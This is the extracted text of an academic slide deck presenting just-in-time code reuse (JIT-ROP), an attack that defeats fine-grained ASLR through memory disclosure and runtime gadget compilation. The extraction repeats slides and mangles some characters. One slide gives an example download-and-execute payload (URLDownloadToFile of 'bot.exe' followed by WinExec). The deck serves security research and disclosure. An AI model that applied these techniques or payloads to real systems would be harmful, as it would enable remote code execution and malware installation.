Just-in-Time Code Reuse The more things change, the more they stay - - PowerPoint PPT Presentation

Just-in-Time Code Reuse

The more things change, the more they stay the same

Kevin Z. Snow1 Luca Davi2

• F. Monrose1
• A. Dmitrienko2
• C. Liebchen2

A.-R. Sadeghi2

1 Department of Computer Science

University of North Carolina at Chapel Hill

2 CASED/Technische Universität

Darmstadt, Germany

&

1 Thursday, August 1, 13

The Big Picture

2

2 Thursday, August 1, 13

The Big Picture

2

2 Thursday, August 1, 13

The Big Picture

2

 Scrip&ng ¡facilitates ¡ a0acks

2 Thursday, August 1, 13

The Big Picture

2

Large ¡a0ack ¡surface

 Scrip&ng ¡facilitates ¡ a0acks

2 Thursday, August 1, 13

The Big Picture

2

Large ¡a0ack ¡surface

 Scrip&ng ¡facilitates ¡ a0acks  Exploit ¡packs ¡ automate ¡increasingly ¡ complex ¡a0acks  Adversary ¡must ¡apply ¡ a ¡code-­‑reuse ¡strategy

2 Thursday, August 1, 13

The Big Picture

3

3 Thursday, August 1, 13

The Big Picture

3

3 Thursday, August 1, 13

The Big Picture

n mm

• r

ien ted Pro g ra ing r u t Re

3

3 Thursday, August 1, 13

Basic ROP Attack Technique

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack Heap Code

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack

Stack Var 1 Stack Var 2

Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack

Stack Var 1 Stack Var 2

Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

SP

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack

Stack Var 1 Stack Var 2

Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

Inject ROP Payload SP

RET Address 3 RET Address 2 RET Address 1

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack

Stack Var 1 Stack Var 2

Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

Inject ROP Payload SP

Heap Vulnerability RET Address 3 RET Address 2 RET Address 1

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack

Stack Var 1 Stack Var 2

Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

SP

Heap Vulnerability

Exploit Vulnerability to Launch ROP Payload

RET Address 3 RET Address 2 RET Address 1

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack

Stack Var 1 Stack Var 2

Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

SP

Heap Vulnerability

Exploit Vulnerability to Launch ROP Payload

RET Address 3 RET Address 2 RET Address 1

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack

Stack Var 1 Stack Var 2

Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

SP

Heap Vulnerability

Exploit Vulnerability to Launch ROP Payload

RET Address 3 RET Address 2 RET Address 1

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack

Stack Var 1 Stack Var 2

Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

SP

Heap Vulnerability

Exploit Vulnerability to Launch ROP Payload

RET Address 3 RET Address 2 RET Address 1

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack

Stack Var 1 Stack Var 2

Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

SP

Heap Vulnerability

Exploit Vulnerability to Launch ROP Payload

RET Address 3 RET Address 2 RET Address 1

4 Thursday, August 1, 13

Basic ROP Attack Technique

Adversary Stack

Stack Var 1 Stack Var 2

Heap Code

Stack Pivot RET LOAD Gadget RET ADD Gadget RET

SP

Heap Vulnerability

Exploit Vulnerability to Launch ROP Payload

RET Address 3 RET Address 2 RET Address 1

4 Thursday, August 1, 13

Code Reuse Attacks History

selected not exhaustive

1997 2001 2005 2007 2009 2010 2008

5 Thursday, August 1, 13

Code Reuse Attacks History

selected not exhaustive

ret2libc Solar Designer

1997 2001 2005 2007 2009 2010 2008

5 Thursday, August 1, 13

Code Reuse Attacks History

selected not exhaustive

ret2libc Solar Designer Advanced ret2libc Nergal

1997 2001 2005 2007 2009 2010 2008

5 Thursday, August 1, 13

Code Reuse Attacks History

selected not exhaustive

ret2libc Solar Designer Advanced ret2libc Nergal Borrowed Code Chunks Exploitation Krahmer

1997 2001 2005 2007 2009 2010 2008

5 Thursday, August 1, 13

Code Reuse Attacks History

selected not exhaustive

ret2libc Solar Designer Advanced ret2libc Nergal Borrowed Code Chunks Exploitation Krahmer ROP Shacham (CCS)

1997 2001 2005 2007 2009 2010 2008

5 Thursday, August 1, 13

Code Reuse Attacks History

selected not exhaustive

ret2libc Solar Designer Advanced ret2libc Nergal Borrowed Code Chunks Exploitation Krahmer ROP Shacham (CCS) ROP Shacham (BlackHat USA) ROP on SPARC Buchanan et al (CCS) ROP on Atmel Francillon et al (CCS)

1997 2001 2005 2007 2009 2010 2008

5 Thursday, August 1, 13

Code Reuse Attacks History

selected not exhaustive

ret2libc Solar Designer Advanced ret2libc Nergal Borrowed Code Chunks Exploitation Krahmer ROP Shacham (CCS) ROP Shacham (BlackHat USA) ROP on SPARC Buchanan et al (CCS) ROP on Atmel Francillon et al (CCS) ROP Rootkits Hund et al (USENIX) ROP on PowerPC FX Lindner (BlackHat USA) ROP on ARM/iOS Miller et al (BlackHat USA)

1997 2001 2005 2007 2009 2010 2008

5 Thursday, August 1, 13

Code Reuse Attacks History

selected not exhaustive

ret2libc Solar Designer Advanced ret2libc Nergal Borrowed Code Chunks Exploitation Krahmer ROP Shacham (CCS) ROP Shacham (BlackHat USA) ROP on SPARC Buchanan et al (CCS) ROP on Atmel Francillon et al (CCS) ROP Rootkits Hund et al (USENIX) ROP without Returns Checkoway et al (CCS) ROP on PowerPC FX Lindner (BlackHat USA) ROP on ARM/iOS Miller et al (BlackHat USA) Roppery Iozzo et al (BlackHat USA) Payload already inside Long Le (BlackHat USA) Pwn2Own iPhone Weinmann & Iozzo Pwn2Own IE Nils Practical ROP Zovi (RSA Conference)

1997 2001 2005 2007 2009 2010 2008

5 Thursday, August 1, 13

ASLR ¡– ¡Address ¡Space ¡Layout ¡Randomiza6on

6 Thursday, August 1, 13

Basics of ASLR

• ASLR randomizes the base address of code/data segments

Program Memory (abstract)

Heap Library (e.g., user32.dll) Stack

Application Run 1

Executable

7

7 Thursday, August 1, 13

Basics of ASLR

• ASLR randomizes the base address of code/data segments

Program Memory (abstract)

Heap Library (e.g., user32.dll) Stack

Application Run 1 Program Memory (abstract)

Heap Stack

Application Run 2

Library (e.g., user32.dll) Executable Executable

7

7 Thursday, August 1, 13

Basics of ASLR

• ASLR randomizes the base address of code/data segments

Program Memory (abstract)

Heap Library (e.g., user32.dll) Stack

Application Run 1 Program Memory (abstract)

Heap Stack

Application Run 2

Library (e.g., user32.dll) Executable Executable Disclosure Attack e.g., [Sotirov et al., Blackhat 2008]

• 1. Exploit disclosure

vulnerability

• 2. Leak function

pointer 3. Adjust instruction sequence pointers

7

7 Thursday, August 1, 13

Heap

Example Memory Disclosure

8

Stack Executable Library (e.g., user32.dll)

Program Memory (abstract)

See ¡[Serna, ¡Blackhat ¡USA ¡2012] ¡for ¡more ¡memory ¡disclosure ¡tac&cs.

8 Thursday, August 1, 13

Heap

Example Memory Disclosure

8

JavaScript String

size string data

Vulnerable Object

array vuln[10]

Object

funcPointer funcPointer

Stack Executable Library (e.g., user32.dll)

Program Memory (abstract)

See ¡[Serna, ¡Blackhat ¡USA ¡2012] ¡for ¡more ¡memory ¡disclosure ¡tac&cs.

8 Thursday, August 1, 13

Heap

Example Memory Disclosure

8

JavaScript String

size string data

Vulnerable Object

array vuln[10] AAAAAAAAAAAAAAAAA MAX_SIZE

Object

funcPointer funcPointer

Stack Executable Library (e.g., user32.dll)

Program Memory (abstract)

See ¡[Serna, ¡Blackhat ¡USA ¡2012] ¡for ¡more ¡memory ¡disclosure ¡tac&cs.

8 Thursday, August 1, 13

Heap

Example Memory Disclosure

8

JavaScript String

size string data

Vulnerable Object

array vuln[10] AAAAAAAAAAAAAAAAA MAX_SIZE

Object

funcPointer funcPointer

Stack Executable Library (e.g., user32.dll) Memory Readable as String Data

Program Memory (abstract)

funcPointer

See ¡[Serna, ¡Blackhat ¡USA ¡2012] ¡for ¡more ¡memory ¡disclosure ¡tac&cs.

8 Thursday, August 1, 13

Tackling ¡the ¡Problems ¡of ¡ASLR ¡via Fine-­‑Grained ¡ASLR

9 Thursday, August 1, 13

Basics of Fine-grained ASLR

10

Library ¡(e.g., ¡user32.dll)

Application ¡Run ¡1

Instruction Sequence 3

RET

Instruction Sequence 2

RET

Instruction Sequence 1

RET

10 Thursday, August 1, 13

Basics of Fine-grained ASLR

10

Library ¡(e.g., ¡user32.dll)

Application ¡Run ¡1

Instruction Sequence 3

RET

Instruction Sequence 2

RET

Instruction Sequence 1

RET

Library ¡(e.g., ¡user32.dll)

Application ¡Run ¡2

Instruction Sequence 2

RET

Instruction Sequence 1

RET

Instruction Sequence 3

RET

 Different ¡fine-­‑grained ¡ASLR ¡approaches ¡have ¡been ¡proposed ¡recently

 ORP ¡[Pappas ¡et ¡al., ¡IEEE ¡Security ¡& ¡Privacy ¡2012]  ILR ¡[Hiser ¡et ¡al., ¡IEEE ¡Security ¡& ¡Privacy ¡2012]  STIR ¡[Wartell ¡et ¡al., ¡ACM ¡CCS ¡2012]  XIFER ¡[Davi ¡et ¡al., ¡ASIACCS ¡2013]  All ¡mi&gate ¡single ¡memory ¡disclosure ¡a0acks

10 Thursday, August 1, 13

Inner Basic Block Randomization

[Pappas et al., IEEE S&P 2012]

• Instruction Reordering

Original

MOV EAX, &string MOV EBX, &ptr

Randomized

11 Thursday, August 1, 13

Inner Basic Block Randomization

[Pappas et al., IEEE S&P 2012]

• Instruction Reordering

Original

MOV EAX, &string MOV EBX, &ptr

Randomized

MOV EBX, &ptr MOV EAX, &string

11 Thursday, August 1, 13

Inner Basic Block Randomization

[Pappas et al., IEEE S&P 2012]

• Instruction Reordering
• Instruction Substitution

Original

MOV EAX, &string MOV EBX, &ptr

Randomized

MOV EBX, &ptr MOV EAX, &string

Original

MOV EBX, $0

Randomized

11 Thursday, August 1, 13

Inner Basic Block Randomization

[Pappas et al., IEEE S&P 2012]

• Instruction Reordering
• Instruction Substitution

Original

MOV EAX, &string MOV EBX, &ptr

Randomized

MOV EBX, &ptr MOV EAX, &string

Original

MOV EBX, $0

Randomized

XOR EBX,EBX

11 Thursday, August 1, 13

Inner Basic Block Randomization

[Pappas et al., IEEE S&P 2012]

• Instruction Reordering
• Instruction Substitution
• Register Re-Allocation (in case another register is free to use)

Original

MOV EAX, &string MOV EBX, &ptr

Randomized

MOV EBX, &ptr MOV EAX, &string

Original

MOV EBX, $0

Randomized

XOR EBX,EBX

Original

CALL *EAX MOV EAX, &ptr

Randomized

11 Thursday, August 1, 13

Inner Basic Block Randomization

[Pappas et al., IEEE S&P 2012]

• Instruction Reordering
• Instruction Substitution
• Register Re-Allocation (in case another register is free to use)

Original

MOV EAX, &string MOV EBX, &ptr

Randomized

MOV EBX, &ptr MOV EAX, &string

Original

MOV EBX, $0

Randomized

XOR EBX,EBX

Original

CALL *EAX MOV EAX, &ptr

Randomized

CALL *EBX MOV EBX, &ptr

11 Thursday, August 1, 13

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original

12 Thursday, August 1, 13

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original

BBL_1 BBL_2 BBL_3

12 Thursday, August 1, 13

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original

BBL_1 MOV EBX, EAX CALL 0x10FF BBL_2 MOV (ESP), EAX RET BBL_3 ADD EAX, ECX RET

0x10FF:

12 Thursday, August 1, 13

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original

BBL_1 MOV EBX, EAX CALL 0x10FF BBL_2 MOV (ESP), EAX RET BBL_3 ADD EAX, ECX RET

0x10FF:

12 Thursday, August 1, 13

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original

BBL_1 MOV EBX, EAX CALL 0x10FF BBL_2 MOV (ESP), EAX RET BBL_3 ADD EAX, ECX RET

0x10FF:

Randomized

12 Thursday, August 1, 13

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original

BBL_1 MOV EBX, EAX CALL 0x10FF BBL_2 MOV (ESP), EAX RET BBL_3 ADD EAX, ECX RET

0x10FF:

Randomized

BBL_2 BBL_3 BBL_1

0x10FF: 0x1000: 0x10A0:

12 Thursday, August 1, 13

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original

BBL_1 MOV EBX, EAX CALL 0x10FF BBL_2 MOV (ESP), EAX RET BBL_3 ADD EAX, ECX RET

0x10FF:

Randomized

BBL_2 BBL_3 BBL_1 MOV EBX, EAX CALL 0x10A0

0x10FF: 0x1000: 0x10A0:

12 Thursday, August 1, 13

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original

BBL_1 MOV EBX, EAX CALL 0x10FF BBL_2 MOV (ESP), EAX RET BBL_3 ADD EAX, ECX RET

0x10FF:

Randomized

BBL_2 BBL_3 ADD EAX, ECX RET BBL_1 MOV EBX, EAX CALL 0x10A0

0x10FF: 0x1000: 0x10A0:

12 Thursday, August 1, 13

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original

BBL_1 MOV EBX, EAX CALL 0x10FF BBL_2 MOV (ESP), EAX RET BBL_3 ADD EAX, ECX RET

0x10FF:

Randomized

BBL_2 BBL_3 ADD EAX, ECX RET BBL_1 MOV EBX, EAX CALL 0x10A0

0x10FF: 0x1000:

JMP 0x1000

0x10A0:

12 Thursday, August 1, 13

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original

BBL_1 MOV EBX, EAX CALL 0x10FF BBL_2 MOV (ESP), EAX RET BBL_3 ADD EAX, ECX RET

0x10FF:

Randomized

BBL_2 MOV (ESP), EAX RET BBL_3 ADD EAX, ECX RET BBL_1 MOV EBX, EAX CALL 0x10A0

0x10FF: 0x1000:

JMP 0x1000

0x10A0:

12 Thursday, August 1, 13

Instruction Location Randomization

[Hiser et al., IEEE S&P 2012]

Original

MOV EBX, EAX CALL 0x10FF MOV (ESP), EAX RET ADD EAX, ECX RET

0x10FF:

13 Thursday, August 1, 13

Instruction Location Randomization

[Hiser et al., IEEE S&P 2012]

Original

MOV EBX, EAX CALL 0x10FF MOV (ESP), EAX RET ADD EAX, ECX RET

0x10FF:

Randomized

CALL 0x3000

0x2000:

MOV EBX, EAX

0x2500:

ADD EAX, ECX

0x3000:

RET

0x12A0:

RET

0x1F00:

MOV (ESP), EAX

0x1000:

13 Thursday, August 1, 13

Instruction Location Randomization

[Hiser et al., IEEE S&P 2012]

Original

MOV EBX, EAX CALL 0x10FF MOV (ESP), EAX RET ADD EAX, ECX RET

0x10FF:

Randomized

CALL 0x3000

0x2000:

MOV EBX, EAX

0x2500:

ADD EAX, ECX

0x3000:

RET

0x12A0:

RET

0x1F00:

MOV (ESP), EAX

0x1000:

0x2500 -> 0x2000 0x2000 -> 0x1000 0x1000 -> 0x12A0 0x3000 -> 0x1F00

Execution is driven by a fall-through map and a binary translation framework (Strata)

13 Thursday, August 1, 13

¡Does ¡Fine-­‑Grained ¡ASLR ¡Provide ¡a ¡ Viable ¡Defense ¡in ¡the ¡Long ¡Run? ¡

14 Thursday, August 1, 13

Contributions

15

15 Thursday, August 1, 13

Contributions

15

A novel attack class that undermines fine-grained ASLR, dubbed just-in-time code reuse

1

15 Thursday, August 1, 13

Contributions

15

A novel attack class that undermines fine-grained ASLR, dubbed just-in-time code reuse

1

We show that memory disclosures are far more damaging than previously believed

2

15 Thursday, August 1, 13

Contributions

15

A novel attack class that undermines fine-grained ASLR, dubbed just-in-time code reuse

1

We show that memory disclosures are far more damaging than previously believed

2

A prototype exploit framework that demonstrates one instantiation of our idea, called JIT-ROP

3

15 Thursday, August 1, 13

Assumptions

16

Defender Adversary

16 Thursday, August 1, 13

Assumptions

16

Defender Adversary

Non-Executable Stack and Heap

16 Thursday, August 1, 13

Assumptions

16

Fine-Grained ASLR

Defender Adversary

Non-Executable Stack and Heap

16 Thursday, August 1, 13

Assumptions

16

Memory Disclosure Vulnerability Fine-Grained ASLR

Defender Adversary

Non-Executable Stack and Heap

16 Thursday, August 1, 13

Assumptions

16

Memory Disclosure Vulnerability Control-Flow Vulnerability Fine-Grained ASLR

Defender Adversary

Non-Executable Stack and Heap

16 Thursday, August 1, 13

Workflow of Just-In-Time Code Reuse

Adversary

17

17 Thursday, August 1, 13

Workflow of Just-In-Time Code Reuse

Adversary

17

Leak Code Pointer

17 Thursday, August 1, 13

Workflow of Just-In-Time Code Reuse

Adversary

Exploit Description

(High-Level Language)

17

Leak Code Pointer

17 Thursday, August 1, 13

Workflow of Just-In-Time Code Reuse

Adversary

Exploit Description

(High-Level Language)

Vulnerable Application

17

Leak Code Pointer

17 Thursday, August 1, 13

Workflow of Just-In-Time Code Reuse

Adversary

Exploit Description

(High-Level Language)

Vulnerable Application

JIT

• ROP Framework

Map Memory

17

Leak Code Pointer

17 Thursday, August 1, 13

Workflow of Just-In-Time Code Reuse

Adversary

Exploit Description

(High-Level Language)

Vulnerable Application

JIT

• ROP Framework

Map Memory Find ROP Sequences (Gadgets)

17

Leak Code Pointer

17 Thursday, August 1, 13

Workflow of Just-In-Time Code Reuse

Adversary

Exploit Description

(High-Level Language)

Vulnerable Application

JIT

• ROP Framework

Map Memory Find ROP Sequences (Gadgets)

17

Leak Code Pointer

Find API Functions

17 Thursday, August 1, 13

Workflow of Just-In-Time Code Reuse

Adversary

Exploit Description

(High-Level Language)

Vulnerable Application

JIT

• ROP Framework

Map Memory Find ROP Sequences (Gadgets)

17

Leak Code Pointer

Find API Functions

Compile ROP Program

17 Thursday, August 1, 13

Workflow of Just-In-Time Code Reuse

Adversary

Exploit Description

(High-Level Language)

Vulnerable Application

JIT

• ROP Framework

Map Memory Find ROP Sequences (Gadgets)

17

Leak Code Pointer

Find API Functions

Compile ROP Program

17 Thursday, August 1, 13

Challenges

18

18 Thursday, August 1, 13

Challenges

18

Map memory without crashing

18 Thursday, August 1, 13

Challenges

18

Map memory without crashing Find gadgets, APIs, and compile payload dynamically at runtime

18 Thursday, August 1, 13

Challenges

18

Map memory without crashing Fully automated Find gadgets, APIs, and compile payload dynamically at runtime

18 Thursday, August 1, 13

Challenges

18

Map memory without crashing Demonstrate efficient, practical exploit Fully automated Find gadgets, APIs, and compile payload dynamically at runtime

18 Thursday, August 1, 13

Our Approach

19

Map Memory JIT Compile

⇒

single leaked function pointer an entire code page is present

Find Gadgets

• bservation:

Find API Calls

19 Thursday, August 1, 13

Our Approach

19

Map Memory JIT Compile

⇒

single leaked function pointer an entire code page is present

f295afcad42b43 638b2bbf6381ff 72efc88bda4cc0 0732bba1575ccb eb7c025e6b8ad3 0c283baa9f03e4 7464fc814176cd 546bcee28e4232

initial code page

Find Gadgets

• bservation:

Find API Calls

19 Thursday, August 1, 13

Our Approach

19

Map Memory JIT Compile

⇒

single leaked function pointer an entire code page is present

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

initial code page

Find Gadgets

• bservation:

Find API Calls

19 Thursday, August 1, 13

Our Approach

19

Map Memory JIT Compile

⇒

single leaked function pointer an entire code page is present

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

initial code page

Find Gadgets

• bservation:

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ... ... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ... ... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

Find API Calls

19 Thursday, August 1, 13

Our Approach

19

Map Memory JIT Compile

⇒

single leaked function pointer an entire code page is present

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

initial code page

Find Gadgets

• bservation:

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ... ... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ... ... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx ... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx ... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx ... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx ... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx ... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx

... ...

Find API Calls

19 Thursday, August 1, 13

Our Approach

20

Map Memory JIT Compile

Find Gadgets Find API Calls

20 Thursday, August 1, 13

Our Approach

20

URLDownloadToFile(“http://...”, “bot.exe”); WinExec(“bot.exe”); ExitProcess(1);

Desired Payload

Map Memory JIT Compile

Find Gadgets Find API Calls

20 Thursday, August 1, 13

Our Approach

20

URLDownloadToFile(“http://...”, “bot.exe”); WinExec(“bot.exe”); ExitProcess(1);

Desired Payload

Map Memory JIT Compile

Find Gadgets Find API Calls

20 Thursday, August 1, 13

Our Approach

20

Code ¡Page ¡Previously ¡Found

Vulnerable ¡Application

URLDownloadToFile(“http://...”, “bot.exe”); WinExec(“bot.exe”); ExitProcess(1);

Desired Payload

Sleep(...) FindWindow(...) GetActiveWindow(...)

 needed ¡APIs ¡o\en ¡not ¡referenced ¡by ¡program

Map Memory JIT Compile

Find Gadgets Find API Calls

20 Thursday, August 1, 13

Our Approach

20

Code ¡Page ¡Previously ¡Found

Vulnerable ¡Application

URLDownloadToFile(“http://...”, “bot.exe”); WinExec(“bot.exe”); ExitProcess(1);

Desired Payload

Sleep(...) FindWindow(...) GetActiveWindow(...)

 needed ¡APIs ¡o\en ¡not ¡referenced ¡by ¡program  dynamic ¡library ¡and ¡func&on ¡loading ¡is ¡common  solu&on: ¡scan ¡for ¡LoadLibrary ¡and ¡ GetProcAddress ¡references ¡instead

LoadLibrary(“library.dll”); GetProcAddress(“func1”) GetProcAddress(“func2”) LoadLibrary(“library.dll”); LoadLibrary(“library.dll”); GetProcAddress(“func1”) GetProcAddress(“func1”) GetProcAddress(“func2”) GetProcAddress(“func2”)

Map Memory JIT Compile

Find Gadgets Find API Calls

20 Thursday, August 1, 13

Our Approach

20

Code ¡Page ¡Previously ¡Found

Vulnerable ¡Application

URLDownloadToFile(“http://...”, “bot.exe”); WinExec(“bot.exe”); ExitProcess(1);

Desired Payload

Sleep(...) FindWindow(...) GetActiveWindow(...)

 needed ¡APIs ¡o\en ¡not ¡referenced ¡by ¡program  dynamic ¡library ¡and ¡func&on ¡loading ¡is ¡common  solu&on: ¡scan ¡for ¡LoadLibrary ¡and ¡ GetProcAddress ¡references ¡instead

LoadLibrary(“library.dll”); GetProcAddress(“func1”) GetProcAddress(“func2”) LoadLibrary(“library.dll”); LoadLibrary(“library.dll”); GetProcAddress(“func1”) GetProcAddress(“func1”) GetProcAddress(“func2”) GetProcAddress(“func2”)

LoadLibrary(“urlmon.dll”); GetProcAddress(@, “URLDownloadT

• File”);

@(“http://...”, “bot.exe”); LoadLibrary(“kernel32.dll”); GetProcAddress(@, “WinExec”); @(“bot.exe”); ...

With Dynamic Loading

Map Memory JIT Compile

Find Gadgets Find API Calls

20 Thursday, August 1, 13

Our Approach

21

Map Memory JIT Compile

Find Gadgets Find API Calls

21 Thursday, August 1, 13

Our Approach

21

gadgets found code pages

... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

Map Memory JIT Compile

Find Gadgets Find API Calls

21 Thursday, August 1, 13

Our Approach

21

ret

mov ebx, eax

gadgets found

ret

mov [ecx], eax pop eax

ret

mov ebx, edx pop eax

ret

mov eax, 0x14

...

code sequences code pages

... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

Galileo Algorithm [Schacham, ACM CCS 2007]

Map Memory JIT Compile

Find Gadgets Find API Calls

21 Thursday, August 1, 13

Our Approach

21

ret

mov ebx, eax

gadgets found

ret

mov [ecx], eax pop eax

ret

mov ebx, edx pop eax

ret

mov eax, 0x14

...

MovRegG JumpG ArithmeticG LoadRegG

...

gadget types code sequences code pages

... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

Galileo Algorithm [Schacham, ACM CCS 2007]

Map Memory JIT Compile

Find Gadgets Find API Calls

21 Thursday, August 1, 13

Our Approach

21

ret

mov ebx, eax

gadgets found

ret

mov [ecx], eax pop eax

ret

mov ebx, edx pop eax

ret

mov eax, 0x14

...

MovRegG JumpG ArithmeticG LoadRegG

...

gadget types code sequences code pages

... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

Galileo Algorithm [Schacham, ACM CCS 2007]

Map Memory JIT Compile

Find Gadgets Find API Calls

21 Thursday, August 1, 13

Our Approach

21

ret

mov ebx, eax

gadgets found

ret

mov [ecx], eax pop eax

ret

mov ebx, edx pop eax

MovRegG JumpG ArithmeticG LoadRegG

...

gadget types code sequences code pages

... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

Galileo Algorithm [Schacham, ACM CCS 2007]

Map Memory JIT Compile

Find Gadgets Find API Calls

21 Thursday, August 1, 13

Our Approach

21

ret

mov ebx, eax

MovRegG

gadgets found

ret

mov [ecx], eax pop eax

ret

mov ebx, edx pop eax

MovRegG JumpG ArithmeticG LoadRegG

...

gadget types code sequences code pages

... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

Galileo Algorithm [Schacham, ACM CCS 2007]

Map Memory JIT Compile

Find Gadgets Find API Calls

21 Thursday, August 1, 13

Our Approach

21

ret

mov ebx, eax

MovRegG

gadgets found

ret

mov ebx, edx pop eax

MovRegG JumpG ArithmeticG LoadRegG

...

gadget types code sequences code pages

... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

Galileo Algorithm [Schacham, ACM CCS 2007]

Map Memory JIT Compile

Find Gadgets Find API Calls

21 Thursday, August 1, 13

Our Approach

21

ret

mov ebx, eax

MovRegG

LoadRegG

gadgets found

ret

mov ebx, edx pop eax

MovRegG JumpG ArithmeticG LoadRegG

...

gadget types code sequences code pages

... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp ... push 0x1 call [-0xFEED] mov ebx, eax jmp

... push 0x1 call [-0xFEED] mov ebx, eax jmp +0xBEEF dec ecx xor ebx, ebx ...

Galileo Algorithm [Schacham, ACM CCS 2007]

Map Memory JIT Compile

Find Gadgets Find API Calls

21 Thursday, August 1, 13

Compiling the ROP program

22

22 Thursday, August 1, 13

Compiling the ROP program

22 JumpG& LoadRegG& MovRegG&

gadgets available

LoadLibrary(“kernel32”); GetProcAddress(@, “WinExec”); @(“calc”, SW_SHOWNORMAL); LoadLibrary(“kernel32”); GetProcAddress(@, “ExitProcess”); @(1);

• ur high-level language

22 Thursday, August 1, 13

Compiling the ROP program

22 JumpG& LoadRegG& MovRegG&

gadgets available

Gadget 1 Gadget 2 Gadget 3 Gadget 5 Gadget 6 Gadget 4

LoadLibrary(“kernel32”); GetProcAddress(@, “WinExec”); @(“calc”, SW_SHOWNORMAL); LoadLibrary(“kernel32”); GetProcAddress(@, “ExitProcess”); @(1);

• ur high-level language

...

generate possible gadget arrangements

22 Thursday, August 1, 13

Compiling the ROP program

22 JumpG& LoadRegG& MovRegG&

gadgets available

Reimplementation of Q gadget compiler algorithms [Schwartz et al., USENIX 2011] extended for multiple program statements and function parameters

